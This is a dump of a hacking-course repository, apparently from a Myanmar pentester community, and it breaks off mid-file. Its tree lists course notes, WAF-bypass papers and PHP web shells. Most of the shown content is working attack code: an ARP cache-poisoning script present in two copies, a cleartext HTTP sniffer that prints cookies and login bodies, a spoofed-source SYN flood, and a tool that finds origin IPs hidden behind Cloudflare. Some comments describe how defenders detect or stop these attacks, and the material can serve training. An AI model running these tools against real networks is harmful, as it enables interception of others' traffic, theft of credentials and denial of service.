├── .github └── workflows │ └── python-publish.yml ├── MPC_python_tools ├── bannar_grub.sh ├── loacal_network_attack │ ├── Spoofer2.py │ ├── arp_spoof.py │ ├── burp_suite.py │ ├── network_scan.py │ └── synflood.py ├── recon_tools │ ├── Real_IP_Finder │ │ ├── README.md │ │ ├── colorama │ │ ├── ipFinder.py │ │ ├── json │ │ ├── pyfiglet │ │ ├── requests │ │ └── requirements.txt │ ├── subFinder.py │ └── wafbypass_ip_finder.py └── writeup_finder.py ├── README.md ├── course_outline ├── MPC-Class_mindmap.minder ├── mpc_class_outline.md └── photo │ └── outline.png ├── gitPush.sh ├── lesson_notes ├── Anit_forensics(Mini_Course) │ ├── AnitForensive_Day2.md │ ├── AntiForensive_Methodology.md │ └── note.md ├── Paper │ ├── Anti_Forencis │ │ ├── Anti-Forensic Techniques_1.pdf │ │ ├── Anti-Forensics-LayerOne-Paul_Henry.pdf │ │ └── anti-forensics-aide.pdf │ ├── DBMS_7thEdition.pdf │ ├── SQL_Injection │ │ ├── A Study of Out-of-Band SQL Injection.pdf │ │ ├── A_novel_method_for_SQL_injection_attack_detection_.pdf │ │ ├── Boolean_based_SQLi_1.pdf │ │ ├── Boolean_based_SQLi_2.pdf │ │ ├── ErrorBaseDoubleQueryInjection.pdf │ │ ├── ErrorBaseDoubleQueryInjection_2.pdf │ │ ├── ErrorBaseDoubleQueryInjection_3.pdf │ │ ├── The Ultimate Guide to SQL Injection _ PurpleBox.pdf │ │ └── sql2.png │ ├── fileUploadVulnerabity.pdf │ └── firewallBypass │ │ ├── CODE_OF_CONDUCT.md │ │ ├── CONTRIBUTING.md │ │ ├── LICENSE │ │ ├── README.md │ │ ├── images │ │ ├── character-interpretations.png │ │ ├── how-wafs-work.png │ │ └── waf-general-arch.png │ │ ├── others │ │ ├── README.md │ │ └── obfu.py │ │ ├── papers │ │ ├── Artificial Neural Network based WAF for SQL Injection.pdf │ │ ├── Beyond SQLi - Obfuscate and Bypass WAFs.txt │ │ ├── Bypassing WAF XSS Detection Mechanisms.pdf │ │ ├── Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf │ │ ├── Evading All Web-Application Firewalls XSS Filters.pdf │ │ ├── Modern WAF Fingerprinting and XSS Filter Bypass.pdf │ │ ├── Poking A Hole In The 
Firewall.pdf │ │ ├── Qualys Guide - Protocol-Level WAF Evasion.pdf │ │ ├── SANS Guide - WAF Evasion Testing.pdf │ │ ├── Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf │ │ ├── WASC WAF Evaluation Criteria.pdf │ │ └── Web Application Firewalls - Evaluation and Analysis.pdf │ │ └── presentations │ │ ├── A Forgotten HTTP Invisibility Cloak.pdf │ │ ├── BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf │ │ ├── BlackHat US 16 - Analysis of Attack Detection Logic.pdf │ │ ├── Building Your Own WAF as a Service and Forgetting about False Positives.pdf │ │ ├── Methods To Bypass A Web Application Firewall.pdf │ │ ├── OWASP WAF Profiling & Evasion.pdf │ │ ├── Our Favourite XSS WAF Filters And How To Bypass Them.pdf │ │ ├── Playing Around with WAFs.pdf │ │ ├── Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf │ │ ├── WAF Bypasses and PHP Exploits (Slides).pdf │ │ └── WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf ├── docker_course │ ├── 01.dockerBasic.md │ ├── 02.ZD Research Lab Installation in Docker.md │ ├── lab.sh │ └── portainer.sh ├── photo │ ├── HTTP.png │ ├── URL_structure.png │ ├── anti_csrf.png │ ├── client&server.png │ ├── com_inject.png │ ├── csrf.png │ ├── csrf_lab.png │ ├── docker.png │ ├── docker2.png │ ├── http_structure.png │ ├── inband.png │ ├── oob.png │ ├── openBounty_1.png │ ├── openBounty_2.png │ ├── openBounty_3.png │ ├── openRe.png │ ├── phishing.png │ ├── report.png │ ├── request_header.png │ ├── sav.png │ ├── sqli.png │ ├── sqli2.png │ ├── sqli3.png │ ├── sqli4.png │ ├── ssrf1.png │ ├── ssrf2.png │ ├── ssrf3.png │ ├── ssrf4.png │ ├── ssrf5.png │ ├── url.png │ ├── waf.png │ ├── waf_function.png │ └── webArchi.png ├── w-10.0_Logic_flaws │ ├── logic_flaw_theory.md │ └── methodology.md ├── w-2.1_webArchi_Ref │ ├── UNIT 6(WWW&HTTP&WAP).pptx │ └── Web_Architecture.md ├── w-2.2_Web_Technologies │ └── w-2.1_web_tech.md ├── w-2.6_Basic_Terminologies │ └── w-2.6.a_Hacking_terminology.md ├── w-3.0_BurpSuit_Ref 
│ ├── Burpsuit_Lacture.drawio.png │ ├── burpCrack_install.md │ ├── w-3.1.a_BurpSuite_Theory.html │ ├── w-3.1.b_lacture_recap.md │ ├── w-3.1.c_test_wordlist.txt │ └── w-3.1.d_BurpDecodeErrorSolve.md ├── w-4.0_open_redirection │ ├── payload.txt │ └── w-4.1.a_Basic Theory about Openredirection.md ├── w-5.0_Command_Injection │ ├── w-5.1.a_CommadI_Theory.md │ ├── w-5.1.b_delimiters.md │ ├── w-5.2.c_phpCodes │ │ ├── commandInject_1.php │ │ └── commandInject_2.php │ └── w-5.5.a_out-of-band_theory.md ├── w-6.0_sql_injection │ ├── 6-1_basic_SQLi.md │ ├── 6-2_finding_SQLI.md │ ├── 6-3_errorBased_SQLi.md │ ├── 6-4_Blind_SQL_Injection.md │ ├── mysql_errorBased.php │ └── mysqli.php ├── w-7.0_waf_bypass │ ├── 7.1_Basic_waf_function.md │ ├── 7.2_waf_bypass.md │ ├── 7.3_advnace_waf_bypass.md │ └── 7.4_firewallBypass_cheatSheet │ │ ├── CODE_OF_CONDUCT.md │ │ ├── CONTRIBUTING.md │ │ ├── LICENSE │ │ ├── README.md │ │ ├── images │ │ ├── character-interpretations.png │ │ ├── how-wafs-work.png │ │ └── waf-general-arch.png │ │ ├── others │ │ ├── README.md │ │ └── obfu.py │ │ ├── papers │ │ ├── Artificial Neural Network based WAF for SQL Injection.pdf │ │ ├── Beyond SQLi - Obfuscate and Bypass WAFs.txt │ │ ├── Bypassing WAF XSS Detection Mechanisms.pdf │ │ ├── Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf │ │ ├── Evading All Web-Application Firewalls XSS Filters.pdf │ │ ├── Modern WAF Fingerprinting and XSS Filter Bypass.pdf │ │ ├── Poking A Hole In The Firewall.pdf │ │ ├── Qualys Guide - Protocol-Level WAF Evasion.pdf │ │ ├── SANS Guide - WAF Evasion Testing.pdf │ │ ├── Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf │ │ ├── WASC WAF Evaluation Criteria.pdf │ │ └── Web Application Firewalls - Evaluation and Analysis.pdf │ │ └── presentations │ │ ├── A Forgotten HTTP Invisibility Cloak.pdf │ │ ├── BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf │ │ ├── BlackHat US 16 - Analysis of Attack Detection Logic.pdf │ │ ├── Building Your Own WAF as a 
Service and Forgetting about False Positives.pdf │ │ ├── Methods To Bypass A Web Application Firewall.pdf │ │ ├── OWASP WAF Profiling & Evasion.pdf │ │ ├── Our Favourite XSS WAF Filters And How To Bypass Them.pdf │ │ ├── Playing Around with WAFs.pdf │ │ ├── Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf │ │ ├── WAF Bypasses and PHP Exploits (Slides).pdf │ │ └── WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf ├── w-8.0_csrf │ ├── csrf.md │ ├── csrf_exploit.html │ ├── csrf_form.html │ ├── csrf_lab_no_defense.md │ └── csrf_lab_no_defense_files │ │ ├── academy.png │ │ ├── analytics.js │ │ ├── anchor.html │ │ ├── api.js │ │ ├── burp-suite-icon.svg │ │ ├── burp-suite.jpg │ │ ├── community.svg │ │ ├── cross-site request forgery.svg │ │ ├── dastardly.svg │ │ ├── enterprise.svg │ │ ├── gtm.js │ │ ├── latest-burp-suite-software-download.jpg │ │ ├── portswigger-logo.svg │ │ ├── professional.svg │ │ ├── psacademy.css │ │ ├── recaptcha__en.js │ │ ├── register.js │ │ ├── saved_resource(1).html │ │ ├── saved_resource.html │ │ ├── staticcms.js │ │ ├── styles__ltr.css │ │ └── tailored-quote.png └── w-9.0_ssrf │ ├── ssrf_lab1.py │ └── ssrf_theory.md ├── pentester_roadmap └── README.md └── shells ├── AlphaShell ├── alfa.php ├── phpinfo2.php ├── shell .jpg ├── shell.php └── shellpass.md ├── Priv8_Shell.php ├── bypass.php └── mini_shell.php /.github/workflows/python-publish.yml: -------------------------------------------------------------------------------- 1 | # This workflow will upload a Python Package using Twine when a release is created 2 | # For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python#publishing-to-package-registries 3 | 4 | # This workflow uses actions that are not certified by GitHub. 5 | # They are provided by a third-party and are governed by 6 | # separate terms of service, privacy policy, and support 7 | # documentation. 
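
name: Upload Python Package

on:
  release:
    types: [published]

permissions:
  contents: read

jobs:
  deploy:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python
      uses: actions/setup-python@v3
      with:
        python-version: '3.x'
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install build
    - name: Build package
      run: python -m build
    - name: Publish package
      # Pinned to a full commit SHA, so a moved or re-pointed tag cannot swap
      # the code that receives the PyPI token (checkout/setup-python above are
      # only tag-pinned).
      uses: pypa/gh-action-pypi-publish@27b31702a0e7fc50959f5ad993c78deac1bdfc29
      with:
        user: __token__
        password: ${{ secrets.PYPI_API_TOKEN }}

--------------------------------------------------------------------------------
/MPC_python_tools/bannar_grub.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Banner grabber: report the HTTP "Server" response header of one host.
#
# Usage: bannar_grub.sh <ip_address> [port]
# The port defaults to DEFAULT_PORT for both the request and the report.

DEFAULT_PORT=80

# Print the usage line and exit with status 1.
print_usage() {
    echo -e "Usage: $0 \e[1;33m<ip_address>\e[0m [\e[1;33mport\e[0m]"
    exit 1
}

# grab_banner <ip_address> [port] [server_header]
# Prints the result table. The third argument is the Server header value;
# when it is omitted the script-level $result is used, as the original did.
grab_banner() {
    local ip_address=$1
    local port=${2:-$DEFAULT_PORT}
    local server_header=${3:-$result}

    echo -e "=============================================="
    echo -e "\e[1;34mBanner Grabbing Results\e[0m"
    echo -e "----------------------------------------------"
    echo -e "\e[1;33mTarget IP:\e[0m\t\t\t${ip_address}"
    echo -e "\e[1;33mTarget Port:\e[0m\t\t\t${port}"
    echo -e "\e[1;33mServer Header:\e[0m\t\t\t${server_header}"
    echo -e "=============================================="
}

if [[ $# -eq 0 ]]; then
    print_usage
fi

ip_address=$1
# Apply the default here as well, so the curl request and the report agree
# on the port (the original only defaulted it inside grab_banner).
port=${2:-$DEFAULT_PORT}

if [[ -z "${ip_address}" ]]; then
    echo -e "\e[1;31mYou must provide an IP address.\e[0m"
    print_usage
fi

echo -e "\e[1;34mAttempting to grab the Server header of ${ip_address}\e[0m"
# -s silent, -I HEAD request only; --max-time keeps an unresponsive host from
# hanging the script. The awk filter matches the Server header itself
# (case-insensitively) rather than any line that merely contains "Server",
# and strips the trailing CR of the header line.
result=$(curl -sI --max-time 10 "${ip_address}:${port}" | awk -F': ' 'tolower($1) == "server" { sub(/\r$/, "", $2); print $2 }')
grab_banner "$ip_address" "$port" "$result"
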
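--------------------------------------------------------------------------------
/MPC_python_tools/loacal_network_attack/Spoofer2.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 19 00:27:30 2022

@author: dr404 (Myanmar Pentester Community)

ARP cache poisoning tool (this file is a byte-identical copy of arp_spoof.py
in the same directory).

Every two seconds it sends one forged ARP "is-at" reply to the target and one
to the gateway, so each of them maps the other's IP address to this machine,
and on Ctrl+C it sends correct replies to put the real mappings back.
From the defensive side this is the traffic that ARP monitoring (an IP whose
MAC suddenly changes, unsolicited replies arriving on a fixed cadence) and
switch-side dynamic ARP inspection are built to detect.
"""


# Read at import time, before the imports below; the script blocks here.
target_ip = input("target IP : ")
gateway_ip = input("GateWay IP : ")

import scapy.all as scapy
from termcolor import colored
import time
import sys

def yellow(string,color='yellow'):
    """Return ``string`` wrapped in termcolor escape codes (yellow by default)."""
    return colored(string,color)


def red(string,color='red'):
    """Return ``string`` wrapped in termcolor escape codes (red by default)."""
    return colored(string,color)

def get_mac(ip):
    """Resolve ``ip`` to a MAC address with a broadcast ARP request.

    Returns the ``hwsrc`` of the first answer received within the 1 s timeout.
    Raises IndexError when no host answers, because the answered list is
    indexed without a length check.
    """

    # ARP(pdst=ip) is a who-has request; Ether(dst=ff:ff:ff:ff:ff:ff) broadcasts it.
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

    # Stack the Ethernet and ARP layers into one frame.
    arp_request_broadcast = broadcast/arp_request

    # srp() returns (answered, unanswered); only the answered pairs are kept.

    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc




def spoof(target_ip, spoof_ip):
    """Send one forged ARP reply to ``target_ip`` claiming ``spoof_ip``.

    ``hwsrc`` is not set, so scapy's default is used (per the author's note in
    restore(), that is this machine's own MAC).
    """

    target_mac = get_mac(target_ip)

    # op=1 is an ARP request (who-has); op=2 is a reply (is-at).

    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

    scapy.send(packet,verbose=False)



def restore(destination_ip, source_ip): # Put the correct mapping back on the destination host

    """Send four correct ARP replies so ``destination_ip`` maps ``source_ip``
    to its real MAC again."""

    destination_mac = get_mac(destination_ip)

    # scapy fills hwsrc with our own MAC by default, so the real MAC of
    # source_ip has to be looked up and set explicitly here.
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac )
    scapy.send(packet, count=4, verbose=False)


def main():
    """Spoof both directions every 2 s until Ctrl+C, then restore both hosts."""

    # A single packet is overwritten as soon as the hosts refresh their ARP
    # caches, hence the loop.


    sent_packet_count = 0

    try:
        while True:
            spoof(target_ip,gateway_ip)
            spoof(gateway_ip,target_ip)

            sent_packet_count = sent_packet_count + 2

            # "\r" returns to the start of the line so only the counter is redrawn.
            print("\r[+] Packet sent : "+ yellow(str(sent_packet_count)),end=" ")

            # The line has no newline, so flush explicitly or nothing shows.
            sys.stdout.flush()

            time.sleep(2)

    except KeyboardInterrupt:
        print(red("\n\n[+] Detected CTRL + C ......Resetting ARP table.....Please Wait. \n"))
        restore(target_ip,gateway_ip)
        restore(gateway_ip,target_ip)




if __name__=='__main__':
    main()


--------------------------------------------------------------------------------
/MPC_python_tools/loacal_network_attack/arp_spoof.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 19 00:27:30 2022

@author: dr404 (Myanmar Pentester Community)

ARP cache poisoning tool (byte-identical to Spoofer2.py in this directory).

Sends a forged ARP reply to the target and one to the gateway every two
seconds so that each maps the other's IP to this machine, and restores the
real mappings on Ctrl+C. The periodic unsolicited replies and the changing
MAC for a known IP are what ARP monitoring and dynamic ARP inspection flag.
"""


# Both prompts run at import time, before the imports below.
target_ip = input("target IP : ")
gateway_ip = input("GateWay IP : ")

import scapy.all as scapy
from termcolor import colored
import time
import sys

def yellow(string,color='yellow'):
    """Colour ``string`` with termcolor; yellow unless ``color`` is given."""
    return colored(string,color)


def red(string,color='red'):
    """Colour ``string`` with termcolor; red unless ``color`` is given."""
    return colored(string,color)

def get_mac(ip):
    """Return the MAC (``hwsrc``) of the first host answering an ARP who-has for ``ip``.

    The answered list is indexed directly, so IndexError is raised when
    nothing replies within the 1 s timeout.
    """

    # Broadcast ARP request for ip.
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

    # Ethernet broadcast frame carrying the ARP request.
    arp_request_broadcast = broadcast/arp_request

    # srp() returns (answered, unanswered) pairs; keep the answered ones.

    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc




def spoof(target_ip, spoof_ip):
    """Send one ARP is-at reply to ``target_ip`` that claims ``spoof_ip``.

    ``hwsrc`` is left at scapy's default, which the author notes is our own MAC.
    """

    target_mac = get_mac(target_ip)

    # op=1: request (who-has); op=2: reply (is-at).

    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)

    scapy.send(packet,verbose=False)



def restore(destination_ip, source_ip): # Restore the victim's correct ARP entry

    """Send four correct replies so ``destination_ip`` learns the real MAC of
    ``source_ip`` again."""

    destination_mac = get_mac(destination_ip)

    # scapy defaults hwsrc to our own MAC, so the real one is looked up and set.
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac )
    scapy.send(packet, count=4, verbose=False)


def main():
    """Loop: spoof both hosts every 2 s; on Ctrl+C restore both and exit."""

    # One packet alone is overwritten by the next legitimate ARP exchange.


    sent_packet_count = 0

    try:
        while True:
            spoof(target_ip,gateway_ip)
            spoof(gateway_ip,target_ip)

            sent_packet_count = sent_packet_count + 2

            # Carriage return redraws the counter in place.
            print("\r[+] Packet sent : "+ yellow(str(sent_packet_count)),end=" ")

            # No newline is printed, so flush by hand.
            sys.stdout.flush()

            time.sleep(2)

    except KeyboardInterrupt:
        print(red("\n\n[+] Detected CTRL + C ......Resetting ARP table.....Please Wait. \n"))
        restore(target_ip,gateway_ip)
        restore(gateway_ip,target_ip)




if __name__=='__main__':
    main()


--------------------------------------------------------------------------------
/MPC_python_tools/loacal_network_attack/burp_suite.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 19 05:58:40 2022

@author: dr404 (Myanmar Pentester Community)

Cleartext HTTP request sniffer. For every captured HTTP request that carries a
body it prints selected headers and the raw body. Everything shown here is
visible only because the traffic is unencrypted HTTP; the same fields inside
TLS never reach the HTTPRequest layer, which is the mitigation.
"""


import scapy.all as scapy


# Need to install scapy_http module (pip3 install scapy_http)
from scapy.layers import http
from termcolor import colored


def banner(name):
    """Print ``name`` followed by two blank lines; returns None (print's result)."""
    return print(name+"\n\n")





name = """
================================================================
# ____ __ __ #
# / _/___ / /_ ___ ____ ____ ___ ___ / /_ ___ ____ #
# _/ / / _ \/ __// -_) / __// __// -_)/ _ \/ __// _ \ / __/ #
# /___//_//_/\__/ \__/ /_/ \__/ \__// .__/\__/ \___//_/ #
# /_/ #
# by Dr.404 #
# https://github.com/dr-404 #
# Myanmar Pentester Community #
# #
================================================================
"""



def yellow(string):
    """Return ``string`` coloured yellow with termcolor."""
    return colored(string,'yellow')



def sniff(interface):
    """Capture on ``interface`` forever, handing each packet to process_sniffed_packet.

    store=False keeps scapy from holding every packet in memory.
    """
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):
    """Print request line, headers and body of a captured HTTP request.

    Only packets with both an HTTPRequest layer and a Raw payload are handled.
    Each header is decoded directly; if one of them is absent the attribute is
    presumably None and the ``.decode`` call raises for that packet — confirm
    against the scapy_http field definitions.
    """


    if packet.haslayer(http.HTTPRequest):


        if packet.haslayer(scapy.Raw):

            #print(packet.show())

            method = packet.Method.decode('UTF-8')

            version = packet.Http_Version.decode('UTF-8')

            uAgent = packet.User_Agent.decode('UTF-8')

            content = packet.Content_Type.decode('UTF-8')

            url = (packet.Host + packet.Path).decode('UTF-8')

            referer = packet.Referer.decode('UTF-8')

            cookie = str(packet.Cookie)

            # Raw payload of the request, i.e. the submitted form body.
            login = packet[scapy.Raw].load.decode("UTF-8")

            print("Request MEthod\t:\t" + yellow(method))
            print("HTTP Version\t:\t" + yellow(version))
            print("User-Agent\t:\t" + yellow(uAgent))
            print("Content-Type\t:\t" + yellow(content))
            print("Requested URL\t:\t" + yellow(url))
            print("Referer\t\t:\t" + yellow(referer))
            print("Cookie\t\t:\t" + yellow(cookie))

            print("Login Info\t:\t"+yellow(login))

# Runs at import time (no __main__ guard); the interface name is hard-coded.
banner(name)
sniff('wlan0')


--------------------------------------------------------------------------------
/MPC_python_tools/loacal_network_attack/network_scan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 16 22:58:16 2022

@author: dr404

ARP host discovery: broadcast an ARP request for an IP or IP range and print
the IP/MAC pairs of the hosts that answer.
"""


from termcolor import colored
import scapy.all as scapy
import argparse

def print_banner(title=""):
    """Print the tool banner in bold green. ``title`` is accepted but unused."""


    print (colored('''
================================================================
# #
# _ __ __ _____ #
# / | / ___ / /_ / ___/_________ _____ ____ ___ _____ #
# / |/ / _ \/ __/ \__ \/ ___/ __ `/ __ \/ __ \/ _ \/ ___/ #
# / /| / __/ /_ ___/ / /__/ /_/ / / / / / / / __/ / #
# /_/ |_/\___/\__/ /____/\___/\__,_/_/ /_/_/ /_/\___/_/ #
# by Dr.404 #
# #
# https://github.com/Dr-404 #
# Myanmar Pentester Community #
# #
================================================================
''', 'green',attrs=(['bold'])))





def scan(ip):
    """Broadcast an ARP request for ``ip`` (single address or range) and return
    the responders.

    Returns a list of ``{"ip": ..., "mac": ...}`` dicts, one per answer
    received within the 1 s timeout; empty when nobody answers.
    """

    # who-has request, broadcast on the Ethernet layer.
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

    arp_request_broadcast = broadcast/arp_request

    # srp() returns (answered, unanswered); only answered pairs are needed.
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    # element[1] is the reply; its psrc/hwsrc identify the answering host.
    return [
        {"ip": element[1].psrc, "mac": element[1].hwsrc}
        for element in answered_list
    ]



def print_result(result_list):
    """Print one ``IP<tab>MAC`` line per entry of ``result_list`` under a header."""
    print("IP\t\t\tMac Address\n---------------------------------------")

    if not result_list:
        print("(no host answered)")
        return

    for client in result_list:
        print(client['ip']+"\t\t"+client['mac'])


def get_argument():
    """Parse the command line. ``-t/--target`` is required: without it the
    original passed None to scapy and failed with an obscure error."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", required=True, help=("Target IP/Ip Range.") )
    option = parser.parse_args()
    return option


def main():
    """Print the banner, scan the requested target and print the result table."""

    print_banner()


    options = get_argument()

    scan_result= scan(options.target)
    print_result(scan_result)




if __name__=='__main__':
    main()


--------------------------------------------------------------------------------
/MPC_python_tools/loacal_network_attack/synflood.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
"""
TCP flood with a user-supplied (forged) source address.

synFlood() sends one IP/TCP/Raw packet to every destination port from 1024 to
65534 of the target; scapy's TCP() default flags field is SYN, so these are
SYN segments with a payload. The forged source address is what BCP 38 egress
filtering at the network edge is designed to drop, and SYN cookies on the
receiving host keep its half-open queue from filling.
"""

from scapy.all import *
import sys
import time





def synFlood(src,tgt,message):
    """Send one packet per destination port in range(1024, 65535).

    ``src`` is written into the IP header as-is; ``sport`` is fixed at 4444.
    The local ``packet_count`` is incremented per packet but never returned.
    """
    packet_count = 0

    for dport in range(1024,65535):
        #dport = 80
        IPlayer = IP(src=src, dst=tgt)
        TCPlayer = TCP(sport=4444, dport=dport)
        RAWlayer = Raw(load=message)

        pkt = IPlayer/TCPlayer/RAWlayer
        send(pkt, verbose=False)

        packet_count = packet_count + 1







def main():
    """Prompt for source, target and payload, then call synFlood() in a loop.

    NOTE: ``packet_count`` is not defined in this scope, so the print below
    raises NameError the first time synFlood() returns.
    """
    source = input("[+] Enter Source IP Address to Fake : ")
    target = input("[+] Enter Target IP : ")
    message = input("[+] Enter Message for TCP paylaod : ")



    while True:
        synFlood(source,target,message)
        #packet_count = packet_count + 1

        print("\r[+] Sending TCP packet : " +str(packet_count))
        sys.stdout.flush()
        time.sleep(2)



if __name__ == "__main__":
    main()


--------------------------------------------------------------------------------
/MPC_python_tools/recon_tools/Real_IP_Finder/README.md:
--------------------------------------------------------------------------------
# How to run this tool

```
1. Register at https://securitytrails.com
2. Copy the API key and export it as the SECURITYTRAILS_API_KEY environment variable before running ipFinder.py
3. Install the required modules using **"pip3 install -r requirements.txt"**
4. Type the domain without "http://" or "https://" and "www", e.g. "google.com" not "www.google.com"
5. Enjoy it
```

### Please don't edit the banner and give credit to Dr.404 (Myanmar Pentester Community)

### Only for Education Purpose

--------------------------------------------------------------------------------
/MPC_python_tools/recon_tools/Real_IP_Finder/colorama:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/colorama
--------------------------------------------------------------------------------
/MPC_python_tools/recon_tools/Real_IP_Finder/ipFinder.py:
--------------------------------------------------------------------------------
"""
Real IP Finder: list historical DNS A records of a domain from the
SecurityTrails history API, skipping entries hosted at Cloudflare.

The API key is read from the SECURITYTRAILS_API_KEY environment variable. A
key was previously hard-coded in this file and committed to the repository;
anything committed that way is public and must be rotated at the provider.
"""

import os
import sys
from urllib.parse import quote

import requests
import colorama
from colorama import Fore, Style
import json
from termcolor import colored, cprint
import pyfiglet

# Banner

banner = pyfiglet.figlet_format("Real IP Finder", font = "slant")
cprint(banner, 'green', attrs=['blink'])
cprint(" by Dr.404\n",'green',attrs=['blink'])

# Colored output helpers

colorama.init(Style.BRIGHT)
blue = Fore.BLUE+Style.BRIGHT
green = Fore.GREEN+Style.BRIGHT
reset = Fore.RESET


# API key from the environment, never from source.
key = os.environ.get("SECURITYTRAILS_API_KEY")
if not key:
    cprint("Set the SECURITYTRAILS_API_KEY environment variable with your SecurityTrails API key.\n", 'red')
    sys.exit(1)

domain = str(input("Enter your domain : ")).strip()
print()


# DNS A-record history for the domain; the key travels in the APIKEY header.
# quote() keeps a stray "/" or "?" in the input from altering the request path.

url = "https://api.securitytrails.com/v1/history/"+quote(domain, safe="")+"/dns/a"
headers = {

    "Accept": "application/json",

    "APIKEY": key

}
# timeout: do not hang on an unresponsive API.
# raise_for_status: surface 401/403/429 here instead of failing later on a
# missing "records" key.
response = requests.get(url, headers=headers, timeout=30)
response.raise_for_status()
response_json = response.json()

responseData = response_json.get("records", [])

for data in responseData:
    try:
        ip = data['values'][0]['ip']
        org = data['organizations'][0]
        date = data['last_seen']
    except (IndexError, KeyError):
        # Record without an IP or organization entry: nothing to report.
        continue
    if org == "Cloudflare, Inc.":
        # Cloudflare edge address, not the origin host.
        continue
    print("The Real IP of Domain may be : ",blue+ip+reset)
    print("The Organization of Domain Hosted is : ",blue+org+reset)
    print("This IP is Last seen on : ",blue+ date +reset)
    print()


--------------------------------------------------------------------------------
/MPC_python_tools/recon_tools/Real_IP_Finder/json:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/json
--------------------------------------------------------------------------------
/MPC_python_tools/recon_tools/Real_IP_Finder/pyfiglet:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/pyfiglet
--------------------------------------------------------------------------------
/MPC_python_tools/recon_tools/Real_IP_Finder/requests:
--------------------------------------------------------------------------------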
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/requests -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | requests 3 | colorama 4 | colorama 5 | termcolor 6 | colored 7 | cprint 8 | pyfiglet 9 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/subFinder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import re 3 | import requests 4 | 5 | 6 | 7 | print(" ") 8 | print(" ____ __ _____ __ ") 9 | print(" / ____ __/ / / __(____ ___/ ___ ____ ") 10 | print(" _\ \/ // / _ \/ _// / _ / _ / -_/ __/ ") 11 | print("/___/\_,_/_.__/_/ /_/_//_\_,_/\__/_/ ") 12 | print(" by ") 13 | print(" +-+-+-+-+-+-+ ") 14 | print(" |D|r|.|4|0|4| ") 15 | print(" +-+-+-+-+-+-+ ") 16 | print(" ") 17 | 18 | """ 19 | First I make request to crt.sh to view certificate log 20 | command ==> curl -X GET https://crt.sh/?q=nugmyanmar.org 21 | """ 22 | 23 | domain_name = input("Enter Domain Name : ") 24 | print("\n") 25 | prefix = "https://crt.sh/?q=" 26 | 27 | #matching subdomain using regex 28 | pattern = str ("\w+\."+domain_name) #\w mean alphanumical 29 | 30 | #Making request 31 | sub_Raw= requests.get(prefix + domain_name) 32 | result_Raw = str(sub_Raw.text) 33 | 34 | 35 | #patterm_www = "www." + domain_name 36 | result_filter = re.findall(pattern, result_Raw) 37 | result_list = [] 38 | 39 | for i in result_filter: 40 | 41 | result = i.replace("
